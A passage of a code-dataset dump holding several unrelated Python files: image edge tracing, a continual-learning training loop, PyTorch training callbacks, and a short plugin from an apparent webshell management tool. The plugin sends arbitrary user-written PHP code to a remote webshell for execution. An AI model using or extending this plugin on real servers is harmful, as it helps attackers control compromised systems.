= False\n # add to max_mask__\n max_mask__ |= mask__\n\n return max_mask__\n\n\ndef trace_max(blob, mask__, verbose=False):\n\n max_ = {*zip(*mask__.nonzero())} # convert mask__ into a set of (y,x)\n\n if verbose:\n step = 100 / len(max_) # progress % percent per pixel\n progress = 0.0; print(f\"\\rTracing max... {round(progress)} %\", end=\"\"); sys.stdout.flush()\n\n P_ = []\n link_ = set()\n while max_: # queue of (y,x,P)s\n y, x = max_.pop()\n qtrace = deque([(y, x, None)]) # queue tp trace start with (y, x) from max_\n\n while qtrace:\n # initialize dert to form P\n y, x, _P = qtrace.popleft() # pop from queue\n i = blob.i__[blob.ibox.slice()][y, x] # get i\n dy, dx, g = blob.der__t.get_pixel(y, x) # get dy, dx, g\n m = ave_dangle # m is at maximum value because P direction is the same as dert gradient direction\n assert g > 0, \"g must be positive\"\n P = form_P(blob, CP(yx=(y, x), axis=(dy/g, dx/g), cells={(y,x)}, dert_=[(y, x, i, dy, dx, g, m)]))\n P_ += [P]\n if _P is not None:\n link_ |= {(_P, P)}\n\n # search in max_ path\n adjacents = max_ & {*product(range(y-1,y+2), range(x-1,x+2))} # search neighbors\n qtrace.extend(((_y, _x, P) for _y, _x in adjacents))\n max_ -= adjacents\n # set difference = first set AND not both sets: https://www.scaler.com/topics/python-set-difference/#\n if verbose:\n progress += step; print(f\"\\rTracing max... {round(progress)} %\", end=\"\"); sys.stdout.flush()\n\n if verbose: print(\"\\r\" + \" \" * 79, end=\"\"); sys.stdout.flush(); print(\"\\r\", end=\"\")\n\n return P_, link_\n\ndef form_P(blob, P):\n\n scan_direction(blob, P, fleft=1) # scan left\n scan_direction(blob, P, fleft=0) # scan right\n # init:\n _, _, I, Dy, Dx, G, Ma = map(sum, zip(*P.dert_))\n L = len(P.dert_)\n M = ave_g*L - G\n G = np.hypot(Dy, Dx) # recompute G\n P.ptuple = Tptuple(I, Dy, Dx, G, M, Ma, L)\n P.yx = P.dert_[L//2][:2] # new center\n\n return P\n\ndef scan_direction(blob, P, fleft): # leftward or rightward from y,x\n\n Y, X = blob.mask__.shape # boundary\n sin,cos = _dy,_dx = P.axis # unpack axis\n _y, _x = P.yx # start with pivot\n r = cos*_y - sin*_x # from P line equation: cos*y - sin*x = r = constant\n _cy,_cx = round(_y), round(_x) # keep initial cell\n y, x = (_y-sin,_x-cos) if fleft else (_y+sin, _x+cos) # first dert in the direction of axis\n\n while True: # scan to blob boundary or angle miss\n x0, y0 = int(x), int(y) # floor\n x1, y1 = x0 + 1, y0 + 1 # ceiling\n if x0 < 0 or x1 >= X or y0 < 0 or y1 >= Y: break # boundary check\n kernel = [ # cell weighing by inverse distance from float y,x:\n # https://www.researchgate.net/publication/241293868_A_study_of_sub-pixel_interpolation_algorithm_in_digital_speckle_correlation_method\n (y0, x0, (y1 - y) * (x1 - x)),\n (y0, x1, (y1 - y) * (x - x0)),\n (y1, x0, (y - y0) * (x1 - x)),\n (y1, x1, (y - y0) * (x - x0))]\n cy, cx = round(y), round(x) # nearest cell of (y, x)\n if not blob.mask__[cy, cx]:\n break\n if abs(cy-_cy) + abs(cx-_cx) == 2: # mask of cell between (y,x) and (_y,_x)\n my = (_cy+cy) / 2 # midpoint cell, P axis is above, below or over it\n mx = (_cx+cx) / 2\n _my_cos = sin * mx + r # _my*cos at mx in P, to avoid division\n my_cos = my * cos # new cell\n if cos < 0: my_cos, _my_cos = -my_cos, -_my_cos # reverse sign for comparison because of cos\n if abs(my_cos-_my_cos) > 1e-5:\n ty, tx = ( # deviation from P axis: above/_y>y, below/_y cy else (cy, _cx))\n )\n if not blob.mask__[ty, tx]: break # if the cell is masked, stop\n P.cells |= {(ty,tx)}\n\n ider__t = (blob.i__[blob.ibox.slice()],) + blob.der__t\n i,dy,dx,g = (sum((par__[ky, kx] * dist for ky, kx, dist in kernel)) for par__ in ider__t)\n mangle,dangle = comp_angle((_dy,_dx), (dy, dx))\n if mangle < 0: # terminate P if angle miss\n break\n P.cells |= {(cy, cx)} # add current cell to overlap\n _cy, _cx, _dy, _dx = cy, cx, dy, dx\n if fleft:\n P.dert_ = [(y,x,i,dy,dx,g,mangle)] + P.dert_ # append left\n y -= sin; x -= cos # next y,x\n else:\n P.dert_ = P.dert_ + [(y,x,i,dy,dx,g,mangle)] # append right\n y += sin; x += cos # next y,x\n\n# not revised:\ndef form_link_(blob, mask__):\n\n max_yx_ = set(zip(*mask__.nonzero())) # mask__ coordinates\n dert_root_ = defaultdict(set)\n for P in blob.P_:\n for y,x in P.cells & max_yx_:\n dert_root_[y,x].add(P)\n\n # trace edge from each P\n blob.P_link_ = set() # clear P_link_\n for P in blob.P_:\n traceq_ = deque(P.cells & max_yx_) # start with cells & max_\n traced_ = set(traceq_)\n while traceq_: # trace adjacent through max_\n _y, _x = traceq_.popleft()\n # check for root\n stop = False\n for _P in (dert_root_[_y, _x] - {P}):\n link = (P, _P) if P.id < _P.id else (_P, P)\n blob.P_link_.add(link)\n stop = True # stop when a root is reached\n if not stop: # continue\n yx_ = {*product(range(_y-1,_y+2), range(_x-1,_x+2))}\n yx_ = (yx_ & max_yx_) - traced_\n traceq_.extend(yx_)\n traced_ |= yx_","sub_path":"frame_2D_alg/vectorize_edge_blob/slice_edge.py","file_name":"slice_edge.py","file_ext":"py","file_size_in_byte":9326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"141009756","text":"import torch\nfrom torch import nn, optim\nfrom sklearn.metrics import accuracy_score\nfrom .utils import val_acc_per_subset\n\n\ndef train(model, train_dl, test_dl, epochs_per_set=1, lr=1e-3, buffer=None):\n criterion = nn.CrossEntropyLoss()\n optimizer = optim.SGD(model.parameters(), lr=lr)\n table = []\n\n for task_id, task in enumerate(train_dl):\n a = 1 / (task_id + 1)\n model.train()\n for input, target in task:\n input = input.float().cuda()\n target = target.cuda()\n for step in range(5):\n optimizer.zero_grad()\n output = model(input)\n loss_s = criterion(output, target)\n loss_r = 0\n if buffer:\n m_input, m_target = buffer.sample(len(input))\n if m_input is not None and m_target is not None:\n m_input = m_input.float().cuda()\n m_target = m_target.cuda()\n m_output = model(m_input)\n loss_r = criterion(m_output, m_target)\n else:\n loss_r = 0\n loss = a * loss_s + (1 - a) * loss_r\n loss.backward()\n optimizer.step()\n if buffer:\n buffer.update_memory(input, target)\n\n model.eval()\n if (task_id+1) % epochs_per_set == 0:\n predictions = []\n targets = []\n with torch.no_grad():\n for input, target in test_dl:\n input = input.cuda()\n output = model(input)\n predicted = torch.argmax(output, 1)\n predictions += predicted.cpu()\n targets += target\n\n val_acc = accuracy_score(targets, predictions)\n subset = task_id #[2 * task_id, 2 * task_id + 1]\n table.append([subset] + val_acc_per_subset(targets, predictions) + [val_acc])\n\n return table","sub_path":"utils/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"606399540","text":"from os import remove\nfrom uuid import uuid4\nfrom libs.config import alias, color\nfrom libs.myapp import send, open_editor, newfile\n\n\n@alias(True, func_alias=\"exec\", _type=\"SHELL\")\ndef run(editor: str = \"\", edit_args: str = \"\"):\n \"\"\"\n execute\n\n execute Custom PHP code by notepad / vi as default or your own editor, edit_args split by space.\n\n\n eg: execute {editor=\"\"} {edit_args=\"\"} execute code '\"--wait\"'\n \"\"\"\n file_name = str(uuid4()) + \".php\"\n real_file_path = newfile(file_name)\n\n open_editor(real_file_path, editor, edit_args)\n with open(real_file_path, \"r\") as f:\n code = f.read()\n if (code.startswith(\"\")):\n code = code[:-2]\n print(color.yellow(\"Execute php code...\"))\n res = send(code)\n if (not res):\n return\n text = res.r_text.strip()\n status_code = color.green(str(\n res.status_code)) if res.status_code == 200 else color.yellow(str(res.status_code))\n print(\n f\"\\n{color.green('Result:')}\\n[{status_code}] {color.cyan('length')}: {len(text)} \\n{text}\\n\")\n remove(real_file_path)\n","sub_path":"doughnuts/webshell_plugins/execute.py","file_name":"execute.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"613138700","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCallbacks implementation. Inspired by Keras.\n\"\"\"\n\n# NOTE(kudkudak): There is no (yet) standalone tensorboard, and I don't think it makes sense to use tensorboardX\nimport tensorflow\n\nimport timeit\nimport gin\nimport sys\nimport numpy as np\nimport pandas as pd\nimport os\nimport pickle\nimport logging\nimport time\nimport datetime\nimport json\nimport copy\nfrom collections import defaultdict, OrderedDict\n\nimport torch\n\n\nfrom gin.config import _OPERATIVE_CONFIG\n\nfrom src.utils import save_weights\nfrom src.utils import acc_chexnet_covid, auc_chexnet_covid, acc_chexnet_covid_numpy\n\ntypes_of_instance_to_save_in_csv = (int, float, complex, np.int64, np.int32, np.float32, np.float64, np.float128, str)\nlogger = logging.getLogger(__name__)\n\nclass CallbackList:\n def __init__(self, callbacks=None):\n callbacks = callbacks or []\n self.callbacks = [c for c in callbacks]\n\n def append(self, callback):\n self.callbacks.append(callback)\n\n def set_params(self, params):\n for callback in self.callbacks:\n callback.set_params(params)\n\n def set_model(self, model):\n for callback in self.callbacks:\n callback.set_model(model)\n\n def on_epoch_begin(self, epoch, logs=None):\n logs = logs or {}\n for callback in self.callbacks:\n callback.on_epoch_begin(epoch, logs)\n\n def on_epoch_end(self, epoch, logs=None):\n logs = logs or {}\n for callback in self.callbacks:\n callback.on_epoch_end(epoch, logs)\n\n def on_batch_begin(self, batch, logs=None):\n logs = logs or {}\n for callback in self.callbacks:\n callback.on_batch_begin(batch, logs)\n\n def on_batch_end(self, batch, logs=None):\n logs = logs or {}\n for callback in self.callbacks:\n callback.on_batch_end(batch, logs)\n\n def on_forward_begin(self, batch, data):\n for callback in self.callbacks:\n callback.on_forward_begin(batch, data)\n\n def on_backward_end(self, batch):\n for callback in self.callbacks:\n callback.on_backward_end(batch)\n\n def on_train_begin(self, logs=None):\n logs = logs or {}\n for callback in self.callbacks:\n callback.on_train_begin(logs)\n\n def on_train_end(self, logs=None):\n logs = logs or {}\n for callback in self.callbacks:\n callback.on_train_end(logs)\n\n def on_train_epoch_begin(self, epoch, logs):\n logs = logs or {}\n for callback in self.callbacks:\n if hasattr(callback, 'on_train_epoch_begin'):\n callback.on_train_epoch_begin(epoch, logs)\n\n def on_val_epoch_begin(self, epoch, logs):\n logs = logs or {}\n for callback in self.callbacks:\n if hasattr(callback, 'on_val_epoch_begin'):\n callback.on_val_epoch_begin(epoch, logs)\n\n def on_test_epoch_begin(self, epoch, logs):\n logs = logs or {}\n for callback in self.callbacks:\n if hasattr(callback, 'on_test_epoch_begin'):\n callback.on_test_epoch_begin(epoch, logs)\n\n def on_val_batch_end(self, batch, logs):\n logs = logs or {}\n for callback in self.callbacks:\n callback.on_val_batch_end(batch, logs)\n\n def __iter__(self):\n return iter(self.callbacks)\n\nclass Callback(object):\n def __init__(self):\n pass\n\n def set_config(self, config):\n self.config = config\n\n def set_meta_data(self, meta_data):\n self.meta_data = meta_data\n\n def set_save_path(self, save_path):\n self.save_path = save_path\n\n def set_optimizer(self, optimizer):\n self.optimizer = optimizer\n\n def set_model(self, model, ignore=True):\n if ignore:\n return\n self.model = model\n\n def set_params(self, params):\n self.params = params\n\n def set_dataloader(self, data):\n self.data = data\n\n def get_dataloader(self):\n return self.data\n\n def get_config(self):\n return self.config\n\n def get_meta_data(self):\n return self.meta_data\n\n def get_optimizer(self):\n return self.optimizer\n\n def get_params(self):\n return self.params\n\n def get_model(self):\n return self.model\n\n def get_save_path(self):\n return self.save_path\n\n def on_epoch_begin(self, epoch, logs):\n pass\n\n def on_epoch_end(self, epoch, logs):\n pass\n\n def on_batch_begin(self, batch, logs):\n pass\n\n def on_batch_end(self, batch, logs):\n pass\n\n def on_forward_begin(self, batch, data):\n pass\n\n def on_backward_end(self, batch):\n pass\n\n def on_train_begin(self, logs):\n pass\n\n def on_train_end(self, logs):\n pass\n\n def on_train_epoch_begin(self, epoch, logs):\n pass\n\n def on_val_epoch_begin(self, epoch, logs):\n pass\n\n def on_test_epoch_begin(self, epoch, logs):\n pass\n\n def on_val_batch_end(self, batch, logs):\n pass\n \n \n \nclass BaseLogger(Callback):\n \"\"\"Callback that accumulates epoch averages.\"\"\"\n def __init__(self):\n super(BaseLogger, self).__init__()\n\n def on_epoch_begin(self, epoch, logs=None):\n self.seen = 0\n self.totals = defaultdict(float)\n\n def on_batch_end(self, batch, logs=None):\n batch_size = logs.get('size', 0)\n self.seen += batch_size\n if logs is not None:\n for k, v in logs.items():\n self.totals[k] += v * batch_size\n\n\n def on_epoch_end(self, epoch, logs=None):\n if logs is not None:\n for k in self.totals:\n logs[k] = self.totals[k] / self.seen\n \n\n@gin.configurable\nclass GradualUnfreezing(Callback):\n \"\"\"\n Gradually unfreeze layers from last to first every unfreeze_every epochs.\n Assume layers are being progressively unfrozeon from the last layer.\n \"\"\"\n def __init__(self, unfreeze_every=1, level='lowest'):\n self.unfreeze_every = unfreeze_every\n self.layers_info_init = None\n self.level = level\n super(GradualUnfreezing, self).__init__()\n \n @staticmethod\n def pop_last_item(k):\n keywords = k.split('.')\n return '.'.join(keywords[:-1]), keywords[-1]\n \n def get_layers_info(self):\n \"\"\"\n group layers according to self.level\n This assumes layer names follow syntax of the following:\n 'densenet121.features.denseblock4.denselayer15.conv1.weight'\n If not, recommended to upgrade pytorch version.\n \n 'lowest' groups weight and bias etc. from each norm or conv layer\n 'layer' groups norm and conv from each denselayer\n 'block' groups all layers that belong to the same block\n \"\"\"\n layer_names_dict = OrderedDict()\n for name, parameter in self.model.named_parameters():\n layer_name, _ = self.pop_last_item(name)\n if self.level == 'layer' or self.level == 'block':\n layer_name_candidate, last_item = self.pop_last_item(layer_name)\n if last_item.startswith('conv') or last_item.startswith('norm'):\n layer_name = layer_name_candidate\n if self.level == 'block':\n layer_name_candidate, last_item = self.pop_last_item(layer_name)\n if 'layer' in last_item:\n layer_name = layer_name_candidate\n if layer_name not in layer_names_dict:\n layer_names_dict[layer_name] = parameter.requires_grad\n else:\n # consider a layer is unfrozen when all of its params have requires_grad=True\n layer_names_dict[layer_name] &= parameter.requires_grad\n \n #total_num_layers = len(layer_names_dict)\n num_unfrozen_layers = sum(layer_names_dict.values())\n return list(layer_names_dict.keys()), num_unfrozen_layers\n\n def unfreeze_additional_layers(self, epoch):\n num_layers_gradual_unfreeze = epoch // self.unfreeze_every\n num_layers_to_be_unfrozen_total = num_layers_gradual_unfreeze + self.num_unfrozen_layers_init\n layer_names_to_be_unfrozen = self.layers_info_init[-num_layers_to_be_unfrozen_total:]\n for layer_name in layer_names_to_be_unfrozen:\n for name, parameter in self.model.named_parameters():\n if name.startswith(layer_name):\n if not parameter.requires_grad:\n logger.info(f'Unfreezing {name}')\n parameter.requires_grad = True\n else:\n logger.info(f'Already unfrozen: {name}')\n \n \n def on_epoch_begin(self, epoch, logs):\n # 1. Get layer names and how many are unfrozen\n if self.layers_info_init is None:\n self.layers_info_init, self.num_unfrozen_layers_init = self.get_layers_info()\n # 2. Unfreeze subsequent epoch % unfreeze_every layers\n # This must be able to handle continuing to train from a saved checkpoint\n # If picking up from epoch 34, for example, we must unfreeze layers accordingly.\n self.unfreeze_additional_layers(epoch)\n \n\n@gin.configurable\nclass EarlyStopping(Callback):\n \"\"\"\n The source code of this class is under the MIT License and was copied from the Keras project,\n and has been modified.\n Stop training when a monitored quantity has stopped improving.\n Args:\n monitor (int): Quantity to be monitored.\n min_delta (float): Minimum change in the monitored quantity to qualify as an improvement,\n i.e. an absolute change of less than min_delta, will count as no improvement. \n (Default value = 0)\n patience (int): Number of epochs with no improvement after which training will be stopped.\n (Default value = 0)\n verbose (bool): Whether to print when early stopping is done.\n (Default value = False)\n mode (string): One of {'min', 'max'}. In `min` mode, training will stop when the quantity\n monitored has stopped decreasing; in `max` mode it will stop when the quantity monitored has\n stopped increasing. \n (Default value = 'min')\n \"\"\"\n\n def __init__(self, *, monitor='val_loss', min_delta=0, patience=0, verbose=False, mode='min'):\n super(EarlyStopping, self).__init__()\n\n self.monitor = monitor\n self.patience = patience\n self.verbose = verbose\n self.min_delta = min_delta\n self.wait = 0\n self.stopped_epoch = 0\n\n if mode not in ['min', 'max']:\n raise ValueError(\"Invalid mode '%s'\" % mode)\n self.mode = mode\n\n if mode == 'min':\n self.min_delta *= -1\n self.monitor_op = np.less\n elif mode == 'max':\n self.min_delta *= 1\n self.monitor_op = np.greater\n\n def on_train_begin(self, logs):\n # Allow instances to be re-used\n self.wait = 0\n self.stopped_epoch = 0\n self.best = np.Inf if self.mode == 'min' else -np.Inf\n\n def on_epoch_end(self, epoch, logs):\n current = logs[self.monitor]\n if self.monitor_op(current - self.min_delta, self.best):\n self.best = current\n self.wait = 0\n else:\n self.wait += 1\n if self.wait >= self.patience:\n self.stopped_epoch = epoch\n self.model.stop_training = True\n\n def on_train_end(self, logs):\n if self.stopped_epoch > 0 and self.verbose:\n print('Epoch %05d: early stopping' % (self.stopped_epoch + 1))\n\n\n@gin.configurable\nclass CompletedStopping(Callback):\n\n def __init__(self, *, monitor='acc_fmnist', patience=5, verbose=True):\n super(CompletedStopping, self).__init__()\n\n self.monitor = monitor\n self.patience = patience\n\n self.verbose = verbose\n \n self.stopped_epoch = 0\n\n def on_train_begin(self, logs):\n # Allow instances to be re-used\n self.stopped_epoch = 0\n self.counter = 0\n\n def on_epoch_end(self, epoch, logs):\n current = logs[self.monitor]\n if current == 100:\n self.counter +=1\n \n if self.counter>=self.patience:\n \n self.stopped_epoch = epoch\n self.model.stop_training = True\n\n def on_train_end(self, logs):\n if self.stopped_epoch > 0 and self.verbose:\n print('Epoch %05d: completed stopping' % (self.stopped_epoch + 1))\n\n@gin.configurable\nclass LRSchedule(Callback):\n def __init__(self, base_lr, schedule):\n self.schedule = schedule\n self.base_lr = base_lr\n super(LRSchedule, self).__init__()\n\n def on_epoch_begin(self, epoch, logs):\n # Epochs starts from 0\n for e, v in self.schedule:\n if epoch < e:\n break\n for group in self.optimizer.param_groups:\n group['lr'] = v * self.base_lr\n logger.info(\"Fix learning rate to {}\".format(v * self.base_lr))\n\n@gin.configurable\nclass ReduceLROnPlateau_PyTorch(Callback):\n def __init__(self, metric):\n self.metric = metric \n \n def on_train_begin(self, logs):\n self.scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(self.optimizer, \n mode='min', \n factor=0.3, \n patience=5, \n verbose=True, threshold=0.001, threshold_mode='rel', cooldown=0, min_lr=1e-4, eps=1e-08)\n\n def on_epoch_end(self, epoch, logs):\n '''Check for end of current cycle, apply restarts when necessary.'''\n self.scheduler.step(logs[self.metric])\n\n@gin.configurable\nclass ReduceLROnPlateau(Callback):\n def __init__(self, base_lr, factor=0.5, patience=5, threshold=0.1, starting_loss = 0.05, new=False):\n self.factor=factor\n self.patience=patience\n self.threshold=threshold\n self.base_lr = base_lr\n self.best_loss = None\n self.bad_counter = 0\n self.starting_loss = starting_loss\n self.new=new\n self.lowerest = 1e-5 if self.new else 1e-6\n\n super(ReduceLROnPlateau, self).__init__()\n\n def on_batch_end(self, batch, logs):\n if self.best_loss is None:\n self.best_loss = logs['loss']\n # Epochs starts from 0\n if logs['loss']self.threshold*self.best_loss + self.best_loss):\n if (logs['loss']>self.starting_loss) and self.new:\n pass\n else:\n self.bad_counter +=1\n else:\n pass\n\n if self.bad_counter>self.patience and self.base_lr>self.lowerest and logs['loss']self.base_lr:\n group['lr'] = self.base_lr\n\n logger.info(\"Fix learning rate to {}\".format( self.base_lr))\n\n@gin.configurable\nclass CycleScheduler(Callback):\n \n def __init__(self,\n starting_condition_epoch = 100,\n starting_condition_loss = 0.1,\n factor = 0.3,\n step_size = 59,\n ):\n\n self.starting_condition_epoch = starting_condition_epoch\n self.starting_condition_loss = starting_condition_loss\n self.factor = factor\n self.start_flag = False\n self.step_size = step_size\n\n def on_train_begin(self, logs):\n for group in self.optimizer.param_groups:\n self.base_lr = group['lr']\n break\n\n def on_epoch_begin(self, epoch, logs):\n self.step_counter = 0\n\n def on_batch_begin(self, batch, logs):\n if self.start_flag:\n self.step_counter +=1 \n if self.step_counter<=self.step_size:\n \n lr = (self.max_lr - self.min_lr)/self.step_size * self.step_counter + self.min_lr\n else:\n lr = self.max_lr - (self.max_lr - self.min_lr)/(self.step_counter - self.step_size ) * self.step_counter\n\n if self.step_counter>2*self.step_size:\n self.step_counter = 0\n\n for group in self.optimizer.param_groups:\n group['lr'] = lr\n logger.info(\"Fix learning rate to {}\".format(lr))\n\n def on_epoch_end(self, epoch, logs):\n '''Check for end of current cycle, apply restarts when necessary.'''\n if epoch>self.starting_condition_epoch and logs['loss']>self.starting_condition_loss and not self.start_flag:\n self.min_lr = (1-self.factor)*self.base_lr\n self.max_lr = self.base_lr*(1+self.factor)\n \n self.start_flag = True\n self.step_counter = 0\n \nclass History(Callback):\n \"\"\"\n History callback.\n\n By default saves history every epoch, can be configured to save also every k examples\n \"\"\"\n def __init__(self, save_every_k_examples=-1, mode='train'):\n self.examples_seen = 0\n self.save_every_k_examples = save_every_k_examples\n self.examples_seen_since_last_population = 0\n self.mode = mode\n super(History, self).__init__()\n\n def on_train_begin(self, logs=None):\n # self.epoch = []\n self.history = {}\n self.history_batch = {}\n\n def on_epoch_end(self, epoch, logs=None):\n logs = logs or {}\n # self.epoch.append(epoch)\n for k, v in logs.items():\n self.history.setdefault(k, []).append(v)\n\n # if k.endswith(\"nih_labels\"):# and (k not in self.history):\n # # we don't need to save nih_labels every epoch.\n # #self.history[k] = v\n # pass\n # else:\n # self.history.setdefault(k, []).append(v)\n\n if self.save_path is not None:\n base_filename = 'history.pkl' if self.mode == 'train' else 'eval_history.pkl'\n pickle.dump(self.history, open(os.path.join(self.save_path, base_filename), \"wb\"))\n if self.save_every_k_examples != -1:\n pickle.dump(self.history_batch, open(os.path.join(self.save_path, \"history_batch.pkl\"), \"wb\"))\n\n def on_batch_end(self, batch, logs=None):\n # Batches starts from 1\n if self.save_every_k_examples != -1:\n if getattr(self.model, \"history_batch\", None) is None:\n setattr(self.model, \"history_batch\", self)\n assert \"size\" in logs\n self.examples_seen += logs['size']\n logs['examples_seen'] = self.examples_seen\n self.examples_seen_since_last_population += logs['size']\n\n if self.examples_seen_since_last_population > self.save_every_k_examples:\n for k, v in logs.items():\n self.history_batch.setdefault(k, []).append(v)\n self.examples_seen_since_last_population = 0\n\n\nclass ModelCheckpoint(Callback):\n def __init__(self, filepath, monitor='val_loss', verbose=0,\n save_best_only=False,\n mode='auto', period=1):\n super(ModelCheckpoint, self).__init__()\n self.monitor = monitor\n self.verbose = verbose\n self.filepath = filepath\n self.save_best_only = save_best_only\n self.period = period\n self.epochs_since_last_save = 0\n\n if mode not in ['auto', 'min', 'max']:\n mode = 'auto'\n\n if mode == 'min':\n self.monitor_op = np.less\n self.best = np.Inf\n elif mode == 'max':\n self.monitor_op = np.greater\n self.best = -np.Inf\n else:\n if 'acc' in self.monitor or self.monitor.startswith('fmeasure'):\n self.monitor_op = np.greater\n self.best = -np.Inf\n else:\n self.monitor_op = np.less\n self.best = np.Inf\n\n def __getstate__(self):\n state = self.__dict__.copy()\n del state['model']\n del state['optimizer']\n return state\n\n def __setstate__(self, newstate):\n newstate['model'] = self.model\n newstate['optimizer'] = self.optimizer\n self.__dict__.update(newstate)\n\n def on_epoch_end(self, epoch, logs=None):\n logs = logs or {}\n self.epochs_since_last_save += 1\n if self.epochs_since_last_save >= self.period:\n self.epochs_since_last_save = 0\n if self.save_best_only:\n current = logs.get(self.monitor)\n if current is None:\n logging.warning('Can save best model only with %s available, '\n 'skipping.' % (self.monitor), RuntimeWarning)\n else:\n if self.monitor_op(current, self.best):\n if self.verbose > 0:\n print('Epoch %05d: %s improved from %0.5f to %0.5f,'\n ' saving model to %s'\n % (epoch, self.monitor, self.best,\n current, self.filepath))\n self.best = current\n save_weights(self.model, self.optimizer, self.filepath)\n else:\n if self.verbose > 0:\n print('Epoch %05d: %s did not improve' %\n (epoch, self.monitor))\n else:\n if self.verbose > 0:\n print('Epoch %05d: saving model to %s' % (epoch, self.filepath))\n save_weights(self.model, self.optimizer, self.filepath)\n\n\nclass LambdaCallback(Callback):\n def __init__(self,\n on_epoch_begin=None,\n on_epoch_end=None,\n on_batch_begin=None,\n on_batch_end=None,\n on_train_begin=None,\n on_train_end=None):\n super(LambdaCallback, self).__init__()\n if on_epoch_begin is not None:\n self.on_epoch_begin = on_epoch_begin\n else:\n self.on_epoch_begin = lambda epoch, logs: None\n if on_epoch_end is not None:\n self.on_epoch_end = on_epoch_end\n else:\n self.on_epoch_end = lambda epoch, logs: None\n if on_batch_begin is not None:\n self.on_batch_begin = on_batch_begin\n else:\n self.on_batch_begin = lambda batch, logs: None\n if on_batch_end is not None:\n self.on_batch_end = on_batch_end\n else:\n self.on_batch_end = lambda batch, logs: None\n if on_train_begin is not None:\n self.on_train_begin = on_train_begin\n else:\n self.on_train_begin = lambda logs: None\n if on_train_end is not None:\n self.on_train_end = on_train_end\n else:\n self.on_train_end = lambda logs: None\n\n\nclass LambdaCallbackPickableEveryKExamples(LambdaCallback):\n \"\"\"\n Runs lambda every K examples.\n\n Note: Assumes 'size' key in batch logs denoting size of the current minibatch\n \"\"\"\n def __init__(self,\n on_k_examples=None,\n k=45000,\n call_after_first_batch=False,\n **kwargs):\n super(LambdaCallback, self).__init__()\n self.__dict__.update(kwargs)\n self.examples_seen = 0\n self.call_after_first_batch = call_after_first_batch\n self.examples_seen_since_last_call = 0\n self.k = k\n self.on_k_examples = on_k_examples\n self.calls = 0\n\n def on_batch_end(self, batch, logs=None):\n # Batches starts from 1\n assert \"size\" in logs\n self.examples_seen += logs['size']\n self.examples_seen_since_last_call += logs['size']\n\n if (self.call_after_first_batch and batch == 1) \\\n or self.examples_seen_since_last_call > self.k:\n logger.info(\"Batch \" + str(batch))\n logger.info(\"Firing on K examples, ex seen = \" + str(self.examples_seen))\n logger.info(\"Firing on K examples, ex seen last call = \" + str(self.examples_seen_since_last_call))\n self.on_k_examples(logs) # self.calls, self.examples_seen,\n self.examples_seen_since_last_call = 0\n self.calls += 1\n\n def __getstate__(self):\n state = self.__dict__.copy()\n del state['on_k_examples']\n return state\n\n\nclass DumpTensorboardSummaries(Callback):\n def __init__(self):\n super(DumpTensorboardSummaries, self).__init__()\n\n @property\n def file_writer(self):\n if not hasattr(self, '_file_writer'):\n self._file_writer = tensorflow.compat.v1.summary.FileWriter(\n self.save_path, flush_secs=10.)\n return self._file_writer\n\n def on_epoch_end(self, epoch, logs=None):\n summary = tensorflow.compat.v1.Summary()\n for key, value in logs.items():\n try:\n float_value = float(value)\n value = summary.value.add()\n value.tag = key\n value.simple_value = float_value\n except:\n pass\n self.file_writer.add_summary(\n summary, epoch)\n\n@gin.configurable\nclass EvaluateEpoch(Callback):\n def __init__(self, metrics):\n '''\n '''\n super(EvaluateEpoch, self).__init__()\n self.metrics = metrics\n self.metric_func_dict = {'acc': acc_chexnet_covid_numpy, 'auc': auc_chexnet_covid}\n \n def on_epoch_end(self, epoch, logs=None):\n '''appending to log in callback'''\n \n if 'train_predictions' in logs:\n train_preds = logs['train_predictions']\n train_labels = logs['train_labels']\n if 'val_predictions' in logs:\n val_preds = logs['val_predictions']\n val_labels = logs['val_labels']\n if 'test_predictions' in logs:\n test_preds = logs['test_predictions']\n test_labels = logs['test_labels']\n\n for metric in self.metrics:\n \n func = metric.split('_')[0]\n\n if 'train_predictions' in logs:\n logs['{}'.format(metric)] = self.metric_func_dict[func](train_preds, train_labels)\n\n if 'val_predictions' in logs:\n logs['val_{}'.format(metric)] = self.metric_func_dict[func](val_preds, val_labels) \n \n if 'test_predictions' in logs:\n logs['test_{}'.format(metric)] = self.metric_func_dict[func](test_preds, test_labels) \n \n\n@gin.configurable\nclass MetaSaver(Callback):\n def __init__(self):\n super(MetaSaver, self).__init__()\n\n def on_train_begin(self, logs=None):\n logger.info(\"Saving meta data information from the beginning of training\")\n\n assert os.system(\"cp {} {}\".format(sys.argv[0], self.save_path)) == 0, \"Failed to execute cp of source script\"\n\n utc_date = datetime.datetime.utcnow().strftime(\"%Y_%m_%d\")\n\n time_start = time.time()\n cmd = \"python \" + \" \".join(sys.argv)\n self.meta = {\"cmd\": cmd,\n \"save_path\": self.save_path,\n \"most_recent_train_start_date\": utc_date,\n \"execution_time\": -time_start}\n\n json.dump(self.meta, open(os.path.join(self.save_path, \"meta.json\"), \"w\"), indent=4)\n\n # Copy gin configs used, for reference, to the save folder\n os.system(\"rm \" + os.path.join(self.save_path, \"*gin\"))\n for gin_config in sys.argv[2].split(\";\"):\n os.system(\"cp {} {}\".format(gin_config, self.save_path))\n\n def on_train_end(self, logs=None):\n self.meta['execution_time'] += time.time()\n json.dump(self.meta, open(os.path.join(self.save_path, \"meta.json\"), \"w\"), indent=4)\n os.system(\"touch \" + os.path.join(self.save_path, \"FINISHED\"))\n\n@gin.configurable\nclass BreastDataLoader(Callback):\n def __init__(self, \n mode=\"multiclass_cancer_sides\",\n ):\n #self.view_weights = view_weights\n \n super(BreastDataLoader, self).__init__()\n self.mode = mode\n\n def on_train_epoch_begin(self, epoch, logs):\n current_random_seed = self.data.seed_shifter.get_seed(phase='training', epoch_number=epoch)\n self.data.start_training_epoch(random_seed=current_random_seed, mode=self.mode)\n\n def on_val_epoch_begin(self, epoch, logs):\n current_random_seed = self.data.seed_shifter.get_seed(phase='validation', epoch_number=epoch)\n self.data.start_validation_epoch(random_seed=current_random_seed, mode=self.mode)\n\n def on_test_epoch_begin(self, epoch, logs):\n current_random_seed = self.data.seed_shifter.get_seed(phase='test', epoch_number=epoch)\n 